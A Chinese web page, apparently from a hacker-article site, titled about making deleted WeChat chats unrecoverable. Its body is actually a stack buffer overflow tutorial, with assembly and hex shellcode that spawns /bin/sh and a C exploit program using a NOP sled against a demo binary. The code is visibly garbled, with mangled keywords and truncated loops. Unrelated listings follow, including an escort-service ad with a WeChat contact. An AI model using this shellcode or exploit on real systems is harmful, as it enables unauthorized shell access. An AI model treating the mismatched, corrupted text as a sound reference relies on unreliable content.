如何让别人恢复不了微信聊天记录」让对让微信记录删除

访客4年前黑客文章935

利用call压入下一条语句的返回地址,把数据作为下一条指令我们就可以达到目的。 
Jmp CALL 
Popl %esi ‘利用CALL弹出压入的下一条语句的地址,其实就是我们构造的字符串的地址 
movb $0x0,0x7(%esi) ‘输入0的字符串为结尾 
mov %esi,0X8 (%esi) ‘构造NAME数组,放如字串的地址作为NAME[0] 
mov $0x0,0xc(%esi) ‘构造NAME[1]为NULL, NAME[0]为4位地址,所以偏移为0xc 
mov %esi,%ebx ‘设置数据段开始的地址 
leal 0x8(%esi),%ecx ‘设置参数1 
leal 0xc(%esi),%edx ‘设置参数2 
mov $0xb,%eax ‘设置调用号 
int $0x80 ‘调用 
mov $0x0,%ebx 
mov $0x1,%eax 
int $0x80 
Call popl 
.string \"/bin/sh\" 然后通过C编译器编写MYSHELLA *** .C 
运行出错,原因代码段不允许进行修改,但是对于我们溢出是可以的,原因在于溢出是在数据段运行的, 通过GDB查看16进制码,倒出ASCII字符写出TEST.C程序来验证MYSHELLA *** 可以运行 
ret = (int *)&ret + 2; //ret 等于main()执行完后的返回系统的地址 
//(+2是因为:有pushl ebp ,否则加1就可以了。) 但是在堆栈溢出中,关键在于字符串数组的写越界。但是,gets,strcpy等字符串函数在处理字符串的时 候,以"\0" 为字符串结尾。遇\0就结束了写xx作。Myshell中有0X00的字符存在。 
把所有赋予0的xx作用异或或者MOV已知为0的寄存器赋值来完成 
jmp 0x1f 
popl %esi 
movl %esi,0x8(%esi) 
xorl %eax,%eax 
movb %eax,0x7(%esi) 
movl %eax,0xc(%esi) 
movb $0xb,%al 
movl %esi,%ebx 
leal 0x8(%esi),%ecx 
leal 0xc(%esi),%edx 
int $0x80 
xorl %ebx,%ebx 
movl %ebx,%eax 
inc %eax 
int $0x80 
call -0x24 
.string \"/bin/sh\" 汇编得出的 
shellcode = 
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" 
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" 
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; 
我们开始来写一个攻击DEMO溢出的例子 
1:把我们的shellcode提供给他,让他可以访问shellcode。 
2:修改他的返回地址为shellcode的入口地址。 对于strcpy函数,我们要知道被溢出的缓冲的的地址。对于xx作系统来说,一个shell下的每一个程序的 堆栈段开始地址都是 相同的 。我们需要内部写一个调用来获得运行时的堆栈起始地址,来知道了目标程 序堆栈的开始地址。 
(所有C函数的返回值都放在eax 寄存器 里面): 
unsigned long get_sp(void) { 
__a *** __("movl %esp,%eax"); 

buffer相对于堆栈开始地址的偏移,对于DEMO我们可以计算出来,但对于真正有溢出毛病的程序我们在没 有源代码和去跟踪汇编是无法计算出的,只能靠猜测了。不过,一般的程序堆栈大约是 几K 左右。为了 提高命中率,增加溢出的SHELLCODE的长度和NOP指令,NOP指令的机器码为0x90。 同时在我们的程序中允 许输入参数来调节溢出点。 
#include 
#include 
#define OFFSET 0 
#define RET_POSITION 120 
#define RANGE 20 
#define NOP 0x90 char shellcode[]= 
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" 
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" 
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) 

__a *** __("movl %esp,%eax"); 
} main(int argc,char **argv) 

char buff[RET_POSITION+RANGE+1],*ptr; 
long addr; 
unsigned long sp; 
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; 
int i; if(argc>1) 
offset=atoi(argv[1]); sp=get_sp(); 
addr=sp-offset; for(i=0;i *((long *)&(buff[i]))=addr; for(i=0;i buff[i]=NOP; ptr=buff+bsize-RANGE*2-strlen(shellcode)-1; 
for(i=0;i *(ptr++)=shellcode[i]; 
buff[bsize-1]="\0" 
for(i=0;i<132;i++) 
printf("0x%08x\n",buff[i]); 
printf("Jump to 0x%08x\n",addr); execl("./demo","demo",buff,0); 

注意,如果发现溢出允许的空间不足够SHELLCODE的代码,那么可以把地址放到前面去,SHELLCODE放在地 址的后面,程序进行一些改动,原理一致 

相关文章

长春公主岭城区第二轮泰民核酸检测暂未现阳性病例

  (抗击新冠肺炎)长春公主岭城区第二轮核酸检测暂未现阳性病例   中新网长春1月31日电 (谭伟旗)公主岭市常务副市长王刚31日介绍,截至1月31日7时,在公主岭城区启动的第二轮全员核酸检测未发现...

黑客手帐主题边框素材(黑客手帐主题边框素材下载)

黑客手帐主题边框素材(黑客手帐主题边框素材下载)

本文目录一览: 1、旅游手帐怎么制作手绘 2、新手排版干货|最最基础的5种手帐排版方式 3、有能找到手帐(手账)素材的网站吗? 4、好看且好画的边框有哪些? 5、手帐素材怎么做 旅游...

历史上共有4位女皇帝,为何只有武则天一人,被后世承认

历史上共有4位女皇帝,为何只有武则天一人,被后世承认

说起女皇帝,大家想到的必然是武则天,甚至很多人会说,当然是她,除了武则天以外,历史上还有其他女皇帝吗?其实,我国历史上共有4位女皇帝,只不过武则天最为出名罢了。接下来,笔者先为大家介绍一下这4位女皇帝...

色情伴游-【钱岚】

“色情伴游-【钱岚】” 私人导游接待:3756米/天微信号:24**u**m星座:金牛座婚否:未婚体验高端模特的真实评价 南京的客户评价:这次出差,餺?妹妹伴游,陪了我两天两夜,挺满意的,经纪人也...

共工触山(共工触山小古文)

共工触山(共工触山小古文) 共工是我国上古神话传说中的水神,因其与颛顼争夺帝位失败,怒而撞倒不周山,引发天柱倒塌。但实际上,共工并不是一个个体,而是上古时期的强悍部落共工氏的人格化。 据《左传》记...